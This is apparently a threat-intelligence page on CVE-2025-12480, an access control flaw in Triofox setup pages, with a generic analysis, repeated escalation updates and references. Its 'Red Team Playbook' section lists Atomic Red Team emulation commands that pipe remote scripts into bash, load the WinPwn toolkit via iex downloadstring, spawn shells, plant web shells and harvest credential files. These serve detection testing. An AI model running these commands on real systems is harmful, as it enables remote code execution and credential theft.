CVE-2025-12480
Overview
The vulnerability is an improper access control flaw affecting the initial setup pages of the Triofox file sharing platform. The root cause is the failure to restrict access to administrative setup endpoints after the initial configuration is complete. Specifically, unauthenticated network requests can access management interfaces that should be disabled post-setup, exposing sensitive administrative functionality.
Vulnerability Description
Triofox versions prior to 16.7.10368.56560, are vulnerable to an Improper Access Control flaw that allows access to initial setup pages even after setup is complete.
Impact
An attacker with network access can exploit this vulnerability without authentication to gain unauthorized access to sensitive administrative functions of the Triofox database. This enables viewing and modification of critical data, potentially leading to data disclosure, unauthorized data manipulation, or full system compromise. The vulnerability directly threatens the confidentiality and integrity of the file sharing platform's data and administrative controls.
Solution
Upgrade Triofox to version 16.7.10368.56560 or later, where access control protections for initial configuration pages have been enforced. Refer to the vendor's official release notes at https://access.triofox.com/releases_history/ for patch details and installation instructions. No alternative workarounds are documented; applying the vendor-provided patch is required to remediate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Triofox, specifically related to improper access control, allows unauthorized users to access initial setup pages even after the setup process has been completed. This flaw arises from inadequate validation of user permissions, which can lead to sensitive configuration information being exposed. The affected versions of Triofox fail to restrict access to these critical pages, potentially allowing an attacker to manipulate settings or extract sensitive data that should be protected post-setup. The implications of such a vulnerability are significant, as it undermines the integrity of the application’s security model.
Attack vectors for exploiting this vulnerability are varied, but primarily revolve around unauthorized access attempts. An attacker could leverage social engineering tactics to gain access to a legitimate user’s session or exploit weak authentication mechanisms to gain entry. Once inside, the attacker could navigate to the setup pages and alter configurations, potentially leading to further exploitation of the system or lateral movement within the network. Additionally, if the attacker can access sensitive information such as API keys or administrative credentials, they could escalate their privileges and gain broader access to the organization’s infrastructure.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on Triofox for secure file sharing and remote access. The ability to access and modify setup configurations can lead to data breaches, loss of sensitive information, and compromise of user accounts. Furthermore, the business risks associated with such incidents can include financial losses, reputational damage, and regulatory penalties, especially in sectors that are subject to strict compliance requirements. Organizations may face significant operational disruptions as they respond to and recover from an incident stemming from this vulnerability.
To detect and mitigate the risks associated with this improper access control flaw, organizations should implement a multi-faceted approach. Regular vulnerability assessments and penetration testing can help identify potential weaknesses in the system before they can be exploited. Additionally, monitoring access logs for unusual activity can provide early warnings of attempted breaches. Organizations should also ensure that they are running the latest version of Triofox, as updates often contain critical security patches that address known vulnerabilities. Furthermore, implementing strict access controls and user authentication measures can significantly reduce the risk of unauthorized access.
In conclusion, the improper access control vulnerability in Triofox presents a considerable threat to organizations utilizing this software. The potential for unauthorized access to sensitive setup pages poses significant risks, including data breaches and operational disruptions. By adopting proactive detection and mitigation strategies, organizations can safeguard their systems against exploitation and enhance their overall security posture. As the threat landscape continues to evolve, maintaining vigilance and ensuring that security measures are up to date will be crucial in protecting against such vulnerabilities.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2025-12480, with telemetry indicating a significant uptick in attempts to access Triofox’s initial setup pages post-deployment. This increase corresponds with a modest rise in the EPSS score, reflecting growing exploitation interest or scanning activity in the wild. Although no new exploit techniques or ransomware affiliations have been identified, the upward trend in detection frequency signals heightened adversary focus on this improper access control vulnerability. For defenders, this escalation underscores the urgency of monitoring for anomalous access patterns tied to Triofox environments, as the vulnerability’s critical severity combined with increased exploitation attempts elevates the overall threat posture. Consequently, organizations should reassess their risk exposure, recognizing that the likelihood of successful unauthorized access is increasing, thereby amplifying potential operational and data security impacts.
Update 2 — June 23, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2025-12480, reflected by a significant uptick in telemetry signals and a corresponding rise in the Exploit Prediction Scoring System (EPSS) score. This upward movement indicates growing adversary interest and potential preparatory actions targeting the improper access control vulnerability in Triofox versions prior to 16.7.10368.56560. Although no new exploit variants or ransomware affiliations have been identified, the increased EPSS score suggests a higher likelihood of exploitation attempts in the near term. For defenders, this evolving landscape elevates the urgency to enhance monitoring capabilities for anomalous access attempts and reinforces the criticality of maintaining vigilance around Triofox environments. The threat level has consequently shifted to a heightened state, reflecting an increased probability of unauthorized access incidents that could compromise operational integrity and data confidentiality.
Update 3 — July 08, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2025-12480, with our telemetry indicating a sustained increase in attempts to access initial setup pages on vulnerable Triofox instances. This upward trend, while not accompanied by new exploit variants or ransomware affiliations, underscores a growing adversary interest in leveraging the improper access control flaw. The persistence of elevated detection signals suggests that threat actors are actively probing environments for weaknesses, potentially as a precursor to more targeted intrusions. This development heightens the operational risk for organizations running affected Triofox versions, as unauthorized access to setup interfaces could facilitate further compromise or data exposure. Consequently, the threat level associated with this vulnerability has been elevated to reflect a more imminent exploitation risk, emphasizing the need for heightened situational awareness within affected environments.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Gladinet | Triofox | All |
cpe:2.3:a:gladinet:triofox:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
16 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-12480 |
| github.com |
GitHub CVE
third-party-advisory
|
https://github.com/mandiant/Vulnerability-Disclosures/blob/master/2025/MNDT-2025-0008.md |
| triofox.com |
GitHub CVE
product
|
https://www.triofox.com/ |
| access.triofox.com |
GitHub CVE
release-notes
|
https://access.triofox.com/releases_history/ |
| cloud.google.com |
GitHub CVE
third-party-advisory
|
https://cloud.google.com/blog/topics/threat-intelligence/triofox-vulnerability-cve-2025-12480 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-12480 |